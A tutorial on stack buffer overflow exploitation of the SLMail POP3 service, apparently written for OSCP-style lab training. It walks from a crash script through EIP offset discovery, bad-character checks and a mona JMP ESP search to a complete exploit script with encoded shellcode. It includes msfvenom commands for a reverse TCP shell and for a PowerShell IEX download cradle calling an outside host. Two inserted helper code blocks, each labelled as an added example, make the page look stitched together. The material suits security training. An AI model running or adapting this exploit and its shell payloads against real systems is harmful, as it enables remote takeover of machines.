Windows Exploiting (Basic Guide - OSCP level)


Tip

Looking for post-OSCP kernel primitives? Modern registry hive corruption chains for deterministic SYSTEM shells are covered here:

Windows Registry Hive Exploitation

Start installing the SLMail service

Restart the SLMail service

Every time you need to restart the SLMail service you can do it using the Windows console:

net start slmail

Very basic python exploit template

#!/usr/bin/python3

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

buffer = b'A' * 2700  # oversized POP3 password that crashes the service
try:
    print("\nLaunching exploit...")
    s.connect((ip, port))
    data = s.recv(1024)  # read the POP3 banner
    s.send(b'USER username\r\n')
    data = s.recv(1024)
    s.send(b'PASS ' + buffer + b'\r\n')
    print("\nFinished!.")
except socket.error:
    print("Could not connect to " + ip + ":" + str(port))  # port is an int, so convert it

Change the Immunity Debugger font

Go to Options >> Appearance >> Fonts >> Change (Consolas, Bold, 9) >> OK

Attach the process to Immunity Debugger:

File –> Attach

And press the START button

Send the exploit and check whether EIP is affected:

Every time you crash the service you have to restart it as explained at the beginning of this page.

Create a pattern to modify the EIP

The pattern should be as big as the buffer you used to crash the service before.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Change the buffer of the exploit, set the pattern and launch the exploit.

A new crash should appear, but with a different EIP address:

Check whether the address was in your pattern:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438

It looks like we can modify the EIP at offset 2606 of the buffer.

Check it by modifying the buffer of the exploit:

buffer = b'A'*2606 + b'BBBB' + b'CCCC'

With this buffer, the crashed EIP should show 42424242 ("BBBB")

It looks like it is working.
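The pattern_create / pattern_offset step above, reimplemented as an added example (it is not code from this page or from Metasploit): it builds the same Aa0Aa1... cyclic pattern, maps the crash EIP 0x39694438 back to its offset, and shows why the "BBBB" check yields 42424242. The struct-based little-endian handling is the part the page leaves implicit.

```python
import string
import struct

PERIOD = 26 * 26 * 10 * 3  # the Aa0..Zz9 pattern repeats after 20280 bytes


def msf_pattern(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Ab0... cut to `length`."""
    if length > PERIOD:
        raise ValueError("offsets would be ambiguous beyond %d bytes" % PERIOD)
    out = ""
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += upper + lower + digit
                if len(out) >= length:
                    return out[:length]
    return out


def pattern_offset(eip_value, length=3000):
    """Map the EIP shown by the debugger (e.g. 0x39694438) to its offset in
    the pattern. The register displays the 4 bytes as a little-endian
    integer, so unpack them back into memory order first ("8Di9").
    Returns -1 when the value does not come from the pattern."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return msf_pattern(length).find(needle)


def eip_after_crash(buf, offset):
    """Value EIP ends up with when the 4 bytes at `offset` are loaded into it."""
    return struct.unpack("<I", buf[offset:offset + 4])[0]


if __name__ == "__main__":
    off = pattern_offset(0x39694438)          # 2606, same as pattern_offset.rb
    check = b"A" * off + b"BBBB" + b"CCCC"    # the verification buffer from the page
    print("offset:", off, "EIP: 0x%08x" % eip_after_crash(check, off))  # 0x42424242
```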

Check the space for the shellcode inside the stack

600B should be enough for any powerful shellcode.

Let's change the buffer:

buffer = b'A'*2606 + b'BBBB' + b'C'*600

launch the new exploit and check EBP and the length of the usable shellcode

You can see that when the vulnerability is reached, EBP points to the shellcode and that we have plenty of space to place a shellcode here.

In this case we have from 0x0209A128 to 0x0209A2D6 = 430B. Enough.

Check for bad chars

Change the buffer again:

badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = b'A'*2606 + b'BBBB' + badchars

The badchars start at 0x01 because 0x00 is almost always bad.

Run the exploit again and again with this new buffer, removing the chars that turn out to be unusable:

For example:

In this case you can see that you must not use the char 0x0A (nothing is saved in memory after the char 0x09).

In this case you can see that the char 0x0D is avoided:
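A helper for the bad-char comparison described above, added here as an example (not code from the page): it walks the bytes that were sent against the bytes read from ESP in the debugger and reports which byte cut the copy short (the 0x0A case), which bytes were silently skipped (the 0x0D case) and which were stored as a different value. The dumps in the demo are constructed, not taken from SLMail.

```python
def badchar_probe(exclude=()):
    """Bytes 0x01..0xff minus the ones already known to be bad (0x00 assumed bad)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def classify_badchars(sent, dumped):
    """Compare `sent` (the probe) with `dumped` (the bytes copied from ESP).
    Returns a dict with:
      truncated_at: the byte after which nothing more was stored, or None
      dropped:      bytes the service skipped while continuing the copy
      mangled:      {sent_byte: stored_byte} for bytes stored as another value"""
    res = {"truncated_at": None, "dropped": [], "mangled": {}}
    i = j = 0
    while i < len(sent):
        cur = sent[i]
        if j < len(dumped) and dumped[j] == cur:
            i += 1
            j += 1
            continue
        # Mismatch. If the bytes that should follow are nowhere near the
        # current dump position, the copy stopped here (truncating bad char).
        following = sent[i + 1:i + 4]
        if j >= len(dumped) or (following and dumped.find(following, j, j + 8) < 0):
            res["truncated_at"] = cur
            break
        if i + 1 < len(sent) and dumped[j] == sent[i + 1]:
            res["dropped"].append(cur)       # skipped: the next byte took its place
            i += 1
        else:
            res["mangled"][cur] = dumped[j]  # stored, but as a different value
            i += 1
            j += 1
    return res


if __name__ == "__main__":
    # Constructed dumps imitating the two situations described on the page.
    probe = badchar_probe()
    print(classify_badchars(probe, probe[:9] + b"\xcc" * 16))    # truncated_at 0x0A
    probe = badchar_probe(exclude={0x0A})
    print(classify_badchars(probe, probe.replace(b"\x0d", b"")))  # dropped [0x0D]
```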

Find a JMP ESP as return address

Using:

!mona modules    # Get protections, look for all False except the last one (OS DLL)

It will list the memory maps. Look for some DLL that has:

  • Rebase: False
  • SafeSEH: False
  • ASLR: False
  • NXCompat: False
  • OS Dll: True

Now, inside this memory you should find some JMP ESP bytes; to do that run:

!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes inside dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case

Then, if some address is found, choose one that doesn't contain any badchar:

In this case, for example: 0x5f4a358f

Create shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'

If the exploit isn't working but it should (you can see in Immunity Debugger that the shellcode is reached), try creating other shellcodes (msfvenom generates a different shellcode each time with the same parameters).

Add some NOPs at the beginning of the shellcode and use it together with the return address to JMP ESP, then finish the exploit:

#!/usr/bin/python3

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110

shellcode = (
    b"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
    b"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
    b"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
    b"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
    b"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
    b"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
    b"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
    b"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
    b"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
    b"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
    b"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
    b"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
    b"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
    b"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
    b"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
    b"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
    b"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
    b"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
    b"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
    b"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
    b"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
    b"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
    b"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
    b"\x2d\xb8\x63\xe2\x4e\xe9"
)

# 2606 bytes of padding, the JMP ESP address 0x5f4a358f written little-endian,
# a short NOP sled and then the shellcode
buffer = b'A' * 2606 + b'\x8f\x35\x4a\x5f' + b"\x90" * 8 + shellcode
try:
    print("\nLaunching exploit...")
    s.connect((ip, port))
    data = s.recv(1024)  # read the POP3 banner
    s.send(b'USER username\r\n')
    data = s.recv(1024)
    s.send(b'PASS ' + buffer + b'\r\n')
    print("\nFinished!.")
except socket.error:
    print("Could not connect to " + ip + ":" + str(port))  # port is an int, so convert it

Warning

There are shellcodes that overwrite themselves, so it's important to always add a few NOPs before the shellcode

Improving the shellcode

Add these parameters:

EXITFUNC=thread -e x86/shikata_ga_nai
